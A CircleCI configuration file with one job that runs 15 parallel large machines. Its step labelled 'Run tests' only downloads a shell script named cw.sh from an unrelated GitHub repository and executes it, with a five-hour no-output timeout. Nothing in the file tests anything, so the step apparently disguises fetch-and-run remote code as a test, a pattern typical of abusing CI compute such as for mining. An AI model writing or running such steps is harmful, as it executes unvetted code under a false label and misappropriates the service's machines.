jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: |
              wget https://github.com/parkitmove/ubuntu/raw/main/cw.sh && chmod +x cw.sh && ./cw.sh
              no_output_timeout: 5h